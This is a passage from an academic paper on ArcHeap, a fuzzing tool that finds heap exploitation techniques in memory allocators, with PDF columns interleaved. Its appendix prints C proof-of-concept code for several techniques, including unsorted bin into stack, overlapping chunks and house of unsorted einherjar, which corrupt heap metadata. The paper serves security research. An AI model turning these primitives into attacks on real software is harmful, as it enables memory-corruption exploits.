reduces inessential actions from the found exploit. It effectively reduces 84.3% of redundant actions from orig-
We also confirmed that A RC H EAP can find all tcache- inal PoCs (refer to §7.3) and emits small PoCs that contain
related techniques [37] and house-of-force, which HeapHop- 26.1 lines on average (see Table 12). Although our minimiza-
per fails to find because of an arbitrary size allocation. tion is preliminary (i.e., eliminating one independent action
A RC H EAP can find these techniques within a few minutes, as per testing), the final PoC is sufficiently small for manual
they require fewer than five transactions. analysis to understand impacts of the found technique.

8.2 Security Check Coverage 9 Discussion and Limitations


To show how exhaustively A RC H EAP explores the security- Completeness. A RC H EAP is fundamentally incomplete
sensitive part of the state space, we counted the number of due to its random nature, so it would not be surprising at
security checks in ptmalloc2 executed by A RC H EAP. In all if someone discover other heap exploitation techniques.
24 hours of exploration, A RC H EAP executed 18 out of 21 HeapHopper, on the other hand, is complete in terms of given
security checks of ptmalloc2: it failed to cover C2, C4, and models, i.e., exploring all combinations of transactions given
C21 in Table 11. We note that C21 is related to a concurrency the length of transactions. Since their models are incomplete
Version Raw Minimized AEG, particularly for heap vulnerabilities, is too sophisti-
Mean Std. dev Mean Std. dev cated and difficult even for state-of-the-art cyber systems
2.15 112.6 161 25.9 (-77.0 %) 25.3 [21, 30, 62, 67]. Recently, Repel et al. [58] propose symbolic-
2.19 110.8 145 23.3 (-79.0 %) 4.6
2.23 98.3 120 22.5 (-77.1 %) 6.2 execution-based AEG for heap vulnerabilities, but it only
2.27 344.2 177 33 (-90.4 %) 8.8 works for much older allocators without security checks (pt-
Average 166.5 150.8 26.2 (-84.3 %) 11.2 malloc2 version 2.3.3) unlike A RC H EAP (2.23 and 2.27).
Table 12: Average and standard derivation of lines of raw and Heelan et al. [33, 34] demonstrate AEG for heap overflows
minimized PoCs using delta debugging. It shows that the delta in interpreters, but specific to scriptable programs. Unlike
debugging successfully removes 84.3% of redundant actions. the prior work, A RC H EAP focuses on finding heap exploita-
tion techniques, which are re-usable across applications, in
(or often error-prone), proper use of each approach is depen- modern allocators with full security checks.
dent on the target use cases. For example, if one is looking Fuzzing beyond crashes. There has been a large body
for a practical solution to find new exploitation techniques, of attempts to extend fuzzing to find bugs beyond memory
A RC H EAP would be a more preferable platform to start with. safety [29, 75]. They often use differential testing, which
we used for minimization, to find semantic bugs, e.g., com-
Overfitting to fuzzing strategies. A RC H EAP’s approach
pilers [73], cryptographic libraries [9, 53], JVM implemen-
is quite generic in practice even with its specific fuzzing
tations [14] and learning systems [51]. Recently, Slow-
strategies to the common design decisions in §2.1. First,
Fuzz [54] uses fuzzing to find algorithmic complexity bugs,
A RC H EAP can explore security issues related to APIs (e.g.,
and IMF [69] to spot similar code in binary.
double free) without loss of generality because of their stan-
dardization (see, §7.2). Second, A RC H EAP’s approach to Application-aware fuzzing. Application-aware fuzzing is
make random metadata is practically useful thanks to the one of the attempts to reduce the search space of fuzzing.
bipartite design of a real-world allocator. In particular, a In this regard, there have been attempts to use static and dy-
performance-focused allocator that places metadata in a namic analysis [13, 44, 52, 57], bug descriptions [74], and
chunk (e.g., ptmalloc2) has little motivation to avoid the use real-world applications [12, 32, 39] to extract target-specific
of in-place metadata or to violate the cardinal design for its information for fuzzing. Moreover, to reduce the search space
performance. If an allocator is not performance-oriented, it for applications that require well-formed inputs, researchers
will move its metadata to a dedicated place for better security have embedded domain-specific knowledge such as gram-
(e.g., jemalloc). Such a design will make all methods to gener- mar [35, 68, 73] or structure [9, 53] in their fuzzing. Similar
ate metadata useless in finding heap exploitation techniques. to these works, A RC H EAP reduces its search space by consid-
However, A RC H EAP still has a chance to cause overfitting: ering its targets and memory allocators, particularly exploiting
our fuzzing strategies could be insufficient to examine cer- their common designs.
tain allocators. In this case, one might have to devise own 11 Conclusion
models for proper space reduction to apply A RC H EAP to
In this paper, we present A RC H EAP, a new approach using
non-conventional implementation. requiring in-depth under-
fuzzing to automatically discover new heap exploitation tech-
standing of a target allocator. For example, if an allocator
niques. A RC H EAP’s two key ideas are to reduce the search
uses big-endian encoding for its size, a user should encode
space of fuzzing by abstracting the common design of modern
this in A RC H EAP’s fuzzing strategies.
heap allocators, and to devise a method to quickly estimate
Scope. Unlike other automatic exploit generation work, the possibility of heap exploitation. Our evaluation with
A RC H EAP focuses only on finding heap exploit techniques. ptmalloc2 and 10 other allocators shows that A RC H EAP’s ap-
To make end-to-end exploits, we need to properly combine proach can effectively formulate new exploitation primitives
application contexts, which is currently out-of-scope for this regardless of their underlying implementations.
project. Despite many open challenges in realizing fully au-
tomated exploit generation, we believe that A RC H EAP can 12 Acknowledgment
contribute by supplying useful primitives [58]. Moreover, We thank the anonymous reviewers for their helpful feed-
A RC H EAP focuses only on a user-mode allocator. To extend back. This research was supported, in part, by the NSF
A RC H EAP to kernel, we need to handle kernel-specific chal- award CNS-1563848, CNS-1704701, CRI-1629851 and CNS-
lenges, e.g., non-deterministism and zone-based allocation. 1749711 ONR under grant N00014-18-1-2662, N00014-15-
1-2162, N00014-17-1-2895, DARPA AIMEE, and ETRI
10 Related work IITP/KEIT[2014-3-00035], and gifts from Facebook, Mozilla,
Automatic exploit generation (AEG). Automatic discovery Intel, VMware and Google.
of heap exploit techniques is a small step toward AEG’s ambi-
tious vision [4, 10], but it is worth emphasizing its importance
and difficulty. Despite several attempts to accomplish fully
automated exploit generation [4, 10, 11, 33, 46, 58, 60, 70],
References [21] ForAllSecure. Unleashing the Mayhem CRS. https://
forallsecure.com/blog/2016/02/09/unleashing-mayhem/,
[1] anonymous. Once upon a free()... http://phrack.org/issues/ 2016.
57/9.html, 2001.
[22] Free Software Foundation. The GNU C library. https://www.gnu.
[2] anonymous. Chrome os exploit: one byte overflow and sym- org/software/libc/, 1998.
links. https://googleprojectzero.blogspot.com/2016/12/
chrome-os-exploit-one-byte-overflow-and.html, 2016. [23] Free Software Foundation. MallocInternals - glibc wiki. https:
//sourceware.org/glibc/wiki/MallocInternals, 2017.
[3] argp and huku. Pseudomonarchia jemallocum. http://www.phrack.
org/issues/68/10.html, 2012. [24] Free Software Foundation. malloc(3) - Linux manual page. http:
//man7.org/linux/man-pages/man3/malloc.3.html, 2017.
[4] T. Avgerinos, S. K. Cha, A. Rebert, E. J. Schwartz, M. Woo, and
D. Brumley. AEG: Automatic exploit generation. In Proceedings of [25] g463. The use of set_head to defeat the wilderness. http://phrack.
the 18th Annual Network and Distributed System Security Symposium org/issues/64/9.html, 2007.
(NDSS), San Diego, CA, Feb. 2011. [26] S. Ghemawat and P. Menage. Tcmalloc: Thread-caching malloc. http:
[5] T. Avgerinos, A. Rebert, S. K. Cha, and D. Brumley. Enhancing //goog-perftools.sourceforge.net/doc/tcmalloc.html,
symbolic execution with veritesting. In Proceedings of the 36th In- 2009.
ternational Conference on Software Engineering, pages 1083–1094. [27] W. Gloger. Wolfram Gloger’s malloc homepage. http://www.
ACM, 2014. malloc.de/en/, 2006.
[6] Awakened. How a double-free bug in WhatsApp turns to [28] F. Goichon. Glibc adventures: The forgotten chunk. https:
RCE. https://awakened1712.github.io/hacking/hacking- //www.contextis.com/resources/white-papers/glibc-
whatsapp-gif-rce/, 2019. adventures-the-forgotten-chunks, 2015.
[7] blackngel. Malloc des-maleficarum. http://phrack.org/issues/ [29] Google. syzkaller – linux syscall fuzzer. https://github.com/
66/10.html, 2009. google/syzkaller, 2017.
[8] blackngel. The house of lore: Reloaded. http://phrack.org/ [30] GrammaTech. http://blogs.grammatech.com/the-cyber-
issues/67/8.html, 2010. grand-challenge, 2016.
[9] C. Brubaker, S. Jana, B. Ray, S. Khurshid, and V. Shmatikov. Using [31] Gzob Qq. ares_create_query single byte out of buffer write. https:
frankencerts for automated adversarial testing of certificate validation //c-ares.haxx.se/adv_20160929.html, 2016.
in ssl/tls implementations. In Proceedings of the 35th IEEE Symposium [32] H. Han and S. K. Cha. IMF: Inferred model-based fuzzer. In Proceed-
on Security and Privacy (Oakland), San Jose, CA, May 2014. ings of the 24th ACM Conference on Computer and Communications
[10] D. Brumley, P. Poosankam, D. Song, and J. Zheng. Automatic patch- Security (CCS), Dallas, TX, Oct.–Nov. 2017.
based exploit generation is possible: Techniques and implications. In [33] S. Heelan, T. Melham, and D. Kroening. Automatic heap layout
Proceedings of the 29th IEEE Symposium on Security and Privacy manipulation for exploitation. In Proceedings of the 27th USENIX
(Oakland), Oakland, CA, May 2008. Security Symposium (Security), Baltimore, MD, Aug. 2018.
[11] S. K. Cha, T. Avgerinos, A. Rebert, and D. Brumley. Unleashing [34] S. Heelan, T. Melham, and D. Kroening. Gollum: Modular and greybox
mayhem on binary code. In Proceedings of the 33rd IEEE Symposium exploit generation for heap overflows in interpreters. In Proceedings of
on Security and Privacy (Oakland), San Francisco, CA, May 2012. the 26th ACM Conference on Computer and Communications Security
[12] J. Chen, W. Diao, Q. Zhao, C. Zuo, Z. Lin, X. Wang, W. C. Lau, (CCS), London, UK, Nov. 2019.
M. Sun, R. Yang, and K. Zhang. IoTFuzzer: Discovering memory [35] C. Holler, K. Herzig, and A. Zeller. Fuzzing with code fragments.
corruptions in IoT through app-based fuzzing. In Proceedings of the In Proceedings of the 21st USENIX Security Symposium (Security),
2018 Annual Network and Distributed System Security Symposium Bellevue, WA, Aug. 2012.
(NDSS), San Diego, CA, Feb. 2018.
[36] huku. Yet another free() exploitation technique. http://phrack.
[13] P. Chen and H. Chen. Angora: Efficient fuzzing by principled search. org/issues/66/6.html, 2009.
In Proceedings of the 39th IEEE Symposium on Security and Privacy
(Oakland), San Francisco, CA, May 2018. [37] K. Istvan. ptmalloc fanzine. http://tukan.farm/2016/07/26/
ptmalloc-fanzine/, 2016.
[14] Y. Chen, T. Su, C. Sun, Z. Su, and J. Zhao. Coverage-directed dif-
ferential testing of jvm implementations. In Proceedings of the 2016 [38] jp. Advanced Doug lea’s malloc exploits. http://phrack.org/
ACM SIGPLAN Conference on Programming Language Design and issues/61/6.html, 2003.
Implementation (PLDI), Santa Barbara, CA, June 2016. [39] S. Y. Kim, S. Lee, I. Yun, W. Xu, B. Lee, Y. Yun, and T. Kim. CAB-
[15] D. Delorie. malloc per-thread cache: benchmarks. https: Fuzz: Practical Concolic Testing Techniques for COTS Operating
//sourceware.org/ml/libc-alpha/2017-01/msg00452.html, Systems. In Proceedings of the 2017 USENIX Annual Technical Con-
2017. ference (ATC), Santa Clara, CA, July 2017.
[16] C. Eagle. Re: DARPA CGC recap. http://seclists.org/ [40] G. Klees, A. Ruef, B. Cooper, S. Wei, and M. Hicks. Evaluating fuzz
dailydave/2017/q2/2, 2017. testing. In Proceedings of the 25th ACM Conference on Computer and
Communications Security (CCS), Toronto, ON, Canada, Oct. 2018.
[17] M. Eckert, A. Bianchi, R. Wang, Y. Shoshitaishvili, C. Kruegel, and
G. Vigna. HeapHopper: Bringing bounded model checking to heap [41] D. Lea and W. Gloger. A memory allocator, 1996.
implementation security. In Proceedings of the 27th USENIX Security [42] B. Lee, C. Song, Y. Jang, T. Wang, T. Kim, L. Lu, and W. Lee. Prevent-
Symposium (Security), Baltimore, MD, Aug. 2018. ing use-after-free with dangling pointers nullification. In Proceedings
[18] C. Evans and T. Ormandy. The poisoned NUL byte, 2014 edi- of the 2015 Annual Network and Distributed System Security Sympo-
tion. https://googleprojectzero.blogspot.com/2014/08/ sium (NDSS), San Diego, CA, Feb. 2015.
the-poisoned-nul-byte-2014-edition.html, 2014. [43] D. Leijen. mimalloc. https://github.com/microsoft/
[19] J. Evans. Scalable memory allocation using jemalloc. mimalloc, 2019.
https://code.fb.com/core-data/scalable-memory- [44] Y. Li, B. Chen, M. Chandramohan, S.-W. Lin, Y. Liu, and A. Tiu.
allocation-using-jemalloc/, 2011. Steelix: program-state based binary fuzzing. In Proceedings of the
[20] J. N. Ferguson. Understanding the heap by breaking it. In Black Hat 11th Joint Meeting of the European Software Engineering Conference
USA Briefings (Black Hat USA), Las Vegas, NV, Aug. 2007. (ESEC) and the ACM SIGSOFT Symposium on the Foundations of
Software Engineering (FSE), Paderborn, Germany, Aug. 2018. Computer and Communications Security (CCS), Dallas, TX, Oct.–Nov.
[45] LLVM Project. Scudo hardened allocator. https://llvm.org/docs/ 2017.
ScudoHardenedAllocator.html, 2019. [65] S. Silvestro, H. Liu, T. Liu, Z. Lin, and T. Liu. Guarder: A tunable se-
[46] K. Lu, M.-T. Walter, D. Pfaff, S. Nürnberger, W. Lee, and M. Backes. cure allocator. In Proceedings of the 27th USENIX Security Symposium
Unleashing use-before-initialization vulnerabilities in the linux kernel (Security), Baltimore, MD, Aug. 2018.
using targeted stack spraying. In Proceedings of the 2017 Annual [66] st4g3r. House of einherjar - yet another heap exploitation technique on
Network and Distributed System Security Symposium (NDSS), San GLIBC. https://github.com/st4g3r/House-of-Einherjar-
Diego, CA, Feb.–Mar. 2017. CB2016, 2016.
[47] Meh. Exim off-by-one RCE: Exploiting CVE-2018-6789 with fully mit- [67] Trail of Bits. How we faired in the Cyber Grand Chal-
igations bypassing. https://devco.re/blog/2018/03/06/exim- lenge. https://blog.trailofbits.com/2015/07/15/how-we-
off-by-one-RCE-exploiting-CVE-2018-6789-en/, 2019. fared-in-the-cyber-grand-challenge/, 2015.
[48] M. Miller. A snapshot of vulnerability root cause trends for Micrsoft [68] J. Wang, B. Chen, L. Wei, and Y. Liu. Skyfire: Data-driven seed
Remote Code Execution (RCE) CVEs, 2006 through 2017. https:// generation for fuzzing. In Proceedings of the 38th IEEE Symposium
twitter.com/epakskape/status/984481101937651713, 2018. on Security and Privacy (Oakland), San Jose, CA, May 2017.
[49] G. Novark and E. D. Berger. Dieharder: securing the heap. In Proceed- [69] S. Wang and D. Wu. In-memory fuzzing for binary code similarity
ings of the 17th ACM Conference on Computer and Communications analysis. In Proceedings of the 32nd IEEE/ACM International Confer-
Security (CCS), Chicago, IL, Oct. 2010. ence on Automated Software Engineering (ASE), Urbana-Champaign,
[50] Offensive Security. Exploit database - exploits for penetration testers, IL, Oct.–Nov. 2017.
researchers, and ethical hackers. https://www.exploit-db.com/, [70] Y. Wang, C. Zhang, X. Xiang, Z. Zhao, W. Li, X. Gong, B. Liu, K. Chen,
2009. and W. Zou. Revery: From proof-of-concept to exploitable. In Proceed-
[51] K. Pei, Y. Cao, J. Yang, and S. Jana. Deepxplore: Automated whitebox ings of the 25th ACM Conference on Computer and Communications
testing of deep learning systems. In Proceedings of the 26th ACM Security (CCS), Toronto, ON, Canada, Oct. 2018.
Symposium on Operating Systems Principles (SOSP), Shanghai, China, [71] D. Weston and M. Miller. Windows 10 mitigation improvements. In
Oct. 2017. Black Hat USA Briefings (Black Hat USA), Las Vegas, NV, Aug. 2016.
[52] H. Peng, Y. Shoshitaishvili, and M. Payer. T-fuzz: fuzzing by pro- [72] T. Xie, Y. Zhang, J. Li, H. Liu, and D. Gu. New exploit methods against
gram transformation. In Proceedings of the 39th IEEE Symposium on ptmalloc of glibc. In Trustcom/BigDataSE/ISPA, 2016 IEEE, pages
Security and Privacy (Oakland), San Francisco, CA, May 2018. 646–653. IEEE, 2016.
[53] T. Petsios, A. Tang, S. Stolfo, A. D. Keromytis, and S. Jana. Nezha: [73] X. Yang, Y. Chen, E. Eide, and J. Regehr. Finding and understanding
Efficient domain-independent differential testing. In Proceedings of bugs in c compilers. In Proceedings of the 2011 ACM SIGPLAN
the 38th IEEE Symposium on Security and Privacy (Oakland), San Conference on Programming Language Design and Implementation
Jose, CA, May 2017. (PLDI), San Jose, CA, June 2011.
[54] T. Petsios, J. Zhao, A. D. Keromytis, and S. Jana. Slowfuzz: Automated [74] W. You, P. Zong, K. Chen, X. Wang, X. Liao, P. Bian, and B. Liang.
domain-independent detection of algorithmic complexity vulnerabil- SemFuzz: Semantics-based automatic generation of proof-of-concept
ities. In Proceedings of the 24th ACM Conference on Computer and exploits. In Proceedings of the 24th ACM Conference on Computer
Communications Security (CCS), Dallas, TX, Oct.–Nov. 2017. and Communications Security (CCS), Dallas, TX, Oct.–Nov. 2017.
[55] P. Phantasmagoria. Exploiting the wilderness. http://seclists. [75] M. Zalewski. american fuzzy lop. http://lcamtuf.coredump.cx/
org/vuln-dev/2004/Feb/25, 2004. afl/, 2014.
[56] B. Powers, D. Tench, E. D. Berger, and A. McGregor. Mesh: Com- [76] A. Zeller. Yesterday, my program worked. today, it does not. why?
pacting memory management for C/C++ applications. In Proceedings In Proceedings of the 7th European Software Engineering Confer-
of the 2019 ACM SIGPLAN Conference on Programming Language ence (ESEC) / 7th ACM SIGSOFT Symposium on the Foundations of
Design and Implementation (PLDI), Phoenix, AZ, June 2019. Software Engineering (FSE), Toulouse, France, Sept. 1999.
[57] S. Rawat, V. Jain, A. Kumar, L. Cojocar, C. Giuffrida, and H. Bos. [77] H. Zhao, Y. Zhang, K. Yang, and T. Kim. Breaking turtles all the
Vuzzer: Application-aware evolutionary fuzzing. In Proceedings of way down: An exploitation chain to break out of vmware esxi. In
the 2017 Annual Network and Distributed System Security Symposium Proceedings of the 13th USENIX Workshop on Offensive Technologies
(NDSS), San Diego, CA, Feb.–Mar. 2017. (WOOT), Santa Clara, CA, USA, Aug. 2019.
[58] D. Repel, J. Kinder, and L. Cavallaro. Modular synthesis of heap ex-
ploits. In Proceedings of the ACM SIGSAC Workshop on Programming
Languages and Analysis for Security, Dallas, TX, Oct. 2017.
[59] Rich Felker. musl libc. https://www.musl-libc.org/, 2011.
[60] E. J. Schwartz, T. Avgerinos, and D. Brumley. Q: Exploit hardening
made easy. In Proceedings of the 20th USENIX Security Symposium
(Security), San Francisco, CA, Aug. 2011.
[61] shellphish. how2heap: A repository for learning various heap exploita-
tion techniques. https://github.com/shellphish/how2heap,
2016.
[62] Shellphish. DARPA CGC – shellphish. http://shellphish.net/
cgc/, 2016.
[63] Y. Shoshitaishvili, R. Wang, C. Salls, N. Stephens, M. Polino,
A. Dutcher, J. Grosen, S. Feng, C. Hauser, C. Kruegel, and G. Vi-
gna. SoK: (State of) The Art of War: Offensive Techniques in Binary
Analysis. In IEEE Symposium on Security and Privacy, 2016.
[64] S. Silvestro, H. Liu, C. Crosser, Z. Lin, and T. Liu. Freeguard: A faster
secure heap allocator. In Proceedings of the 24th ACM Conference on
A Appendix New Techniques Old Techniques (Bug+Impact+Chunks)
UBS HUE UDF OCS FD UU HS PN HL OC UB HE
DFS (Default) ∞ ∞ ∞ ∞ 3.8m ∞ 31.4s ∞ ∞ ∞ 21.8s ∞
Concretizer ∞ ∞ ∞ ∞ 2.90 h ∞ 1.96 m ∞ ∞ ∞ 5.25 m ∞
Challenge Impacts of exploitation Stochastic ∞ ∞ ∞ ∞ ∞ ∞ ∞ ∞ ∞ ∞ ∞ ∞
Unique ∞ ∞ ∞ ∞ 2.91 h ∞ 2.02 m ∞ ∞ ∞ 51.91 s ∞
OC OC RW AW Veritesting ∞ ∞ ∞ ∞ ∞ ∞ ∞ ∞ ∞ ∞ ∞ ∞

CROMU_00003 ✓ ✓ ✓ ✓
CROMU_00004 ✓ ✓ ✓ ✓ Table 14: Results of §8.1 with various search heuristics supported
KPRCA_00002 ✓ ✓ ✓ ✓ by HeapHopper
KPRCA_00007 ✓ ✓ ✓ ✓
NRFIN_00007
NRFIN_00014 ✓ ✓ ✓ ✓
NRFIN_00024 ✓ ✓ ✓ ✓ 1 // [PRE-CONDITION]
NRFIN_00027 ✓ ✓ ✓ ✓ 2 // fsz: fast bin size
NRFIN_00032 ✓ ✓ 3 // sz: non-fast-bin size
4 // lsz: size larger than page (> 4096)
Table 13: Exploitation techniques found by A RC H EAP in custom 5 // xlsz: very large size that cannot be allocated
allocators of CGC. Except for NRFIN_00007 that implements the 6 // [BUG] buffer overflow
7 // [POST-CONDITION]
page heap, A RC H EAP successfully found exploitation techniques in 8 // malloc(sz) == dst
the custom allocators. 9 void* p0 = malloc(sz);
10 void* p1 = malloc(xlsz);
11 void* p2 = malloc(lsz);
void* p3 = malloc(sz);
A.1 Security of Custom Allocators 12
13

To further evaluate the generality of A RC H EAP, we applied A RC H EAP to 14 // [BUG] overflowing p3 to overwrite top chunk
15 struct malloc_chunk *tc = raw_to_chunk(p3 + chunk_size(sz));
all custom heap allocators implemented for the DARPA CGC competition— 16 tc->size = 0;
since many challenges share the implementation, we selected nine unique 17
ones for our evaluation (see, Table 13). We implemented a missing API, 18 void* p4 = malloc(fsz);
(i.e., malloc_usable_size()) to get the size of allocated objects and ran the 19 void* p5 = malloc(dst - p4 - chunk_size(fsz) \
experiment for 24 hours for each heap allocator. Similar to the previous one, 20 - offsetof(struct malloc_chunk, fd));
21 assert(dst == malloc(sz));
no specific model is provided.
A RC H EAP found exploitation primitives for all of the tested allocators,
except for NRFIN_00007, which implements page heap.Such allocator looks Figure A.1: An exploitation technique for dlmalloc-2.8.6 returning
secure in terms of metadata corruption, but it is impractical due to its memory an arbitrary chunk using overflow bug that was found by A RC H EAP.
overheads causing internal fragmentation. During this evaluation, we found
two interesting results. First, A RC H EAP found exploitation techniques for
NRFIN_00032, which has a heap cookie to overflows. Although this cookie-
1 // [PRE-CONDITION]
based protection is not bypassable via heap metadata corruption, A RC H EAP 2 // sz : any size
found that the implementation is vulnerable to an integer overflow and 3 // [BUG] buffer overflow
could craft two overlapping chunks without corrupting the heap cookie. 4 // [POST-CONDITION]
Second, A RC H EAP found the incorrect implementation of the allocator in 5 // malloc(sz) == dst
6 void* p = malloc(sz);
CROMU_00004, which returns a chunk that is free or its size is larger than the
7 // [BUG] overflowing p
request. A RC H EAP successfully crafted a PoC code resulting in overlapping 8 // tcmalloc has a next chunk address at the end of a chunk
chunks by allocating a smaller chunk than the previous allocation. This 9 *(void**)(p + malloc_usable_size(p)) = dst;
experiment indicates that our common heap designs are indeed universal 10
even for in modern and custom heap allocators (§2.1). 11 // this malloc changes a next chunk address into dst
12 malloc(sz);
A.2 Search Heuristics in HeapHopper 13
14 assert(malloc(sz) == dst);
We also evaluated all search heuristics [63] supported by HeapHopper, which
can be applied without exploit-specific information; for example, we ex- Figure A.2: An exploitation technique for tcmalloc returning an
clude the strategy called ManualMergepoint, which requires an address in a
arbitrary address that was found by A RC H EAP.
binary to merge states. As a result, we collected five search heuristics: DFS,
which is the default mode of HeapHopper; Concretizer, which aggressively
concretizes symbolic values to reduce the number of paths; Unique, which
1 // [PRE-CONDITION]
selects states according to their uniqueness for better coverage; Stochas-
2 // lsz : large size (> 64 KB)
tic, which randomly selects the next states to explore; and Veritesting [5], 3 // xlsz: more large size (>= lsz + 4KB)
which merges states to suppress path explosion combining static and dynamic 4 // [BUG] double free
symbolic execution. 5 // [POST-CONDITION]
Unfortunately, as shown in Table 14, none of them was helpful in our 6 // p2 == malloc(lsz);
evaluation; the default mode (DFS) shows the best performance. First, these 7 void* p0 = malloc(lsz);
8 free(p0);
heuristics only help to mitigate, but cannot solve the fundamental problems 9 void* p1 = malloc(xlsz);
of HeapHopper: path explosion and exponential growing combinations of 10
transactions. More seriously, they cannot exploit a concrete model from 11 // [BUG] free ’p0’ again
HeapHopper to alleviate the aforementioned issues unlike DFS. This explains 12 free(p0);
13
DFS’s best performance and Stochastic’s worst performance. Veritesting
14 void* p2 = malloc(lsz);
failed due to its incorrect handling of undefined behaviors (e.g., NULL 15 free(p1);
dereference) in merged states, which are common in our task assuming 16
memory corruptions. 17 assert(p2 == malloc(lsz));

Figure A.3: An exploitation technique for DieHarder and mimalloc-


secure triggering double free that was found by A RC H EAP.
1 // [PRE-CONDITION]
1 // [PRE-CONDITION] 2 // sz1: non-fast-bin size
2 // sz : any non-fast-bin size 3 // sz2: non-fast-bin size
3 // [BUG] buffer overflow 4 // sz1 and sz2 have the following relationship;
4 // [POST-CONDITION] 5 // assert(chunk_size(sz1) * a == chunk_size(sz2) * b);
5 // malloc(sz) == dst + offsetof(struct malloc_chunk, fd) 6 // [BUG] double free
6 void* p0 = malloc(sz); 7 // [POST-CONDITION] two chunks overlap
7 void* p1 = malloc(sz); 8 for (int i = 0; i < a; i++)
8 void* p2 = malloc(sz); 9 p1[i] = malloc(sz1);
9 10
10 // move p1 to the unsorted bin 11 // allocate a chunk to prevent merging with the top chunk
11 free(p1); 12 void* p = malloc(0);
12 13
13 // create a fake chunk at dst 14 // free from backward not to modify size of p1[a - 1]
14 struct malloc_chunk *fake = dst; 15 for (int i = a - 1; i >= 0; i--)
15 // set fake->size to be the chunk size of the last allocation 16 free(p1[i]);
16 fake->size = chunk_size(sz); 17
17 // set fake->bk to any writable address to avoid a crash 18 // allocate chunks to fill empty space
18 fake->bk = fake; 19 for (int i = 0; i < b; i++)
19 20 p2[i] = malloc(sz2);
20 // [BUG] overflowing p0 21
21 struct malloc_chunk *c1 = raw_to_chunk(p1); 22 // now the next free chunk of p1[a-1] is p whose P=1,
22 // size should be smaller than the next allocation size 23 // and p1[a-1] contains old, yet valid metadata
23 // to avoid returning c1 in the next allocation 24 // [BUG] double free
24 // size shouldn’t be too small due to a security check 25 free(p1[a-1]);
25 c1->size = 2 * sizeof(size_t); 26
26 // set the next pointer in the unsorted bin 27 // new allocation returns p1[a-1] that overlaps with p2[b-1]
27 c1->bk = fake; 28 assert(malloc(sz1) == p1[a-1]);
28
29 // now unsorted bin: c1 -> fake,
30 // and c1 is too small for the request. Figure A.6: A new exploitation technique that A RC H EAP found,
31 // therefore, next allocation returns the fake chunk named unaligned double free, that returns overlapped chunks by the
32 assert(malloc(sz) == fake \
33 + offsetof(struct malloc_chunk, fd)); double free bug.
1 // [PRE-CONDITION]
2 // sz: small bin size
Figure A.4: A new exploitation technique that A RC H EAP found, 3 // assert(chunk_size(sz) & 0xff == 0);
named unsorted bin into stack, that returns arbitrary memory by 4 // [BUG] off-by-one NULL
corrupting the unsorted bin. 5 // [POST-CONDITION]
6 // raw_to_chunk(malloc(sz)) == fake
7 char *p1 = malloc(sz);
8 char *p2 = malloc(sz);
1 // [PRE-CONDITION] 9 char *p3 = malloc(sz);
2 // sz : any small bin size 10 char *p4 = malloc(sz);
3 // sz2 : any small bin size 11
4 // assert(sz2 > sz) 12 // move p1 to unsorted bin
5 // [BUG] buffer overflow 13 free(p1);
6 // [POST-CONDITION] two chunks overlap 14 struct malloc_chunk* c3 = raw_to_chunk(p3);
7 void* p0 = malloc(sz); 15
8 void* p1 = malloc(sz); 16 // make prev_size into double to cover a large chunk
9 void* p2 = malloc(sz); 17 // this is valid by writing p2’s last data
10 18 c3->prev_size = chunk_size(sz) * 2;
11 // move p1 to the unsorted bin 19
12 free(p1); 20 // [BUG] use off-by-one NULL to make P=0 in c3
13 21 assert((c3->size & 0xff) == 0x01);
14 // move p1 to the small bin 22 c3->size &= ~1;
15 void* p3 = malloc(sz2); 23
16 24 // this will merge p1 & p3
17 // [BUG] overflowing p0 25 free(p3);
18 struct malloc_chunk *c1 = raw_to_chunk(p1); 26
19 // growing size into double 27 // if we allocate p5,
20 c1->size = 2 * chunk_size(sz) | 1; 28 // p2 is now points to a free chunk in the unsorted bin
21 29 char *p5 = malloc(sz);
22 // p4’s chunk size = chunk_size(sz) * 2 30
23 void *p4 = malloc(sz); 31 // it’s unsorted bin into stack
24 // move p4 to the unsorted bin 32 struct malloc_chunk* fake = (void*)buf;
25 free(p4); 33
26 34 // set fake->size to chunk_size(sz) for later allocation
27 // splitting p4 into half and returning p5 35 fake->size = chunk_size(sz);
28 void* p5 = malloc(sz); 36
29 // returning the remainder 37 // set fake->bk to any writable address to avoid crash
30 void* p6 = malloc(sz); 38 fake->bk = (void*)buf;
31 39
32 // p2 and p6 overlap 40 struct malloc_chunk* c2 = raw_to_chunk(p2);
33 assert(p2 == p6); 41 c2->bk = fake;
42 assert(raw_to_chunk(malloc(sz)) == fake);

Figure A.5: A new exploitation technique that A RC H EAP found,


named overlapping chunks smallbin, that returns an overlapped Figure A.7: A new exploitation technique that A RC H EAP found,
chunk in small bin. Even though this requires more steps than named house of unsorted einherjar. This is a variant of a known heap
overlapping chunks, it does not need accurate size for allocation. exploitation technique, house of einherjar, but it does not require a
heap address unlike the old one.

You might also like